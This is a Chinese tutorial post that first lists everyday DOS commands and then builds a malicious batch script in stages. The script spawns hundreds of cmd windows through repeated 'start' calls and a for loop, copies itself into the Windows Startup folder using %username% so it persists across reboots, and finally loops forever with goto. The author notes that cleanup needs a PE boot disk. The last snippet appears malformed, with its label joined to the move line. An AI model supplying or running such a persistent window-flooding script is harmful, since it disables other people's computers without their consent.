申明：本文章仅供学习使用

---

今天讲一些简单的Dos命令，并且利用Dos做一个简单的恶意代码，并且不断进行完善。

dir查看目录内容命令
dir/s列出所有文件以及子目录
dir/a列出所有文件，包括隐藏文件

md/mkdir创建目录命令

cd打开指定目录命令

C:改变当前盘符命令

copy 文件复制命令
copy 1.txt 2.txt把 1.txt复制一份并命名为2.txt
copy 1.txt D:\ copy后面也可以跟路径哦

type显示文本文件内容命令

ren 更改文件名命令 重命名

del删除文件命令

copy/echo创建文件
copy con 1.txt
echo xxxx > 1.txt

cls清屏

move移动文件
move 1.txt D:\123

start打开文件
start不加其他参数，就是弹出cmd窗口
start 1.txt打开1.txt

以上都是废话，我总结的不多但是着实比较常用（我比较常用）。接下来介绍一下恶意代码的编写。这里利用刚才介绍的最后两个命令，来实现一个不断弹cmd的功能。

这里再介绍一下批处理，批处理就是dos命令写在bat文件中，系统就会自动调用cmd来执行这些语句。

概念介绍完了，接下来开始实操：

1.最简单的恶意代码，就是写进好多好多行start，就会不断弹出窗口。

@echo off
start
start
start
start
start
start

@echo off是不显示如何执行的这个过程，这里你写几个start就可以弹出几个cmd窗口。


你想多来几个那就Ctrl+C，Ctrl+V多来几下就完事。

---

2.写个for循环不断弹出窗口
一行搞定：

for /l %%i in (1,1,1000) do start

接下来解释一下这一行：
/l指的是按照（start,step,end）的形式来，如果不加的话，会将括号内的数当做一个集合来使用。例：


不加/l就只输出1,1,10，加了就输出1-10.

%%i的意思是将这个参数当成一个变量，在cmd下只要一个%就行，但是在批处理就需要两个。

in (1,1,100)的格式为（start,step,end），（开始，梯度，结束），也就是从1到100，梯度为1。
再举个栗子，（1,2,100），就是从1-100中每隔一个取一个数，也就是1.3.5.7.9…99

do start 就是执行start这个命令。

这个bat我就不敢执行了，昨晚室友整了一下差点被打死。。。

---

3.升级版：开机自启
首先，win+R，输入shell:startup就会跳出一个文件夹，所有在这里的程序都会开机自启。当然，开机自启不止这一种方式，也可以用注册表等其他方式实现。
这里利用move命令实现：

move 1.bat "C:\Users\12751\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
for /l %%i in (1,1,1000) do start

如果你在你的电脑上执行这个 肯定执行不了，只能不断弹出1000个cmd，不能实现开机自启。原因是不同账户路径不同。

那个12751是用户的名字，所以这个只能在我自己本地上实现，并不具备通用性。做进一步改进后，代码如下：

move 1.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
for /l %%i in (1,1,1000) do start

首先要说的是，%username%是引用当前用户名变量。你可以在cmd下执行一下：

所以一个非常非常邪恶的代码就此产生，开机后给你弹1000个cmd才能继续使用（大家还是别试了，小命要紧，可以在虚拟机上试试）

---

你以为这就结束了嘛？不，这个代码还能再升级升级，可以搞成死循环。（一旦死循环就只能重启解决了，要是开机自启那就真要命了。）
4.最终升级版

move 1.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup":1
start
goto 1

这里建了一个标签，标签的结尾又跳转到标签的开头，就会死循环。
一旦这样子之后，解决办法只能用PE进入C盘删除那个文件，所以轻易还是不要试了。

虚拟机给我整崩了，奉劝大家别拿自己的电脑开玩笑~~~

---

再次申明，本章仅供学习使用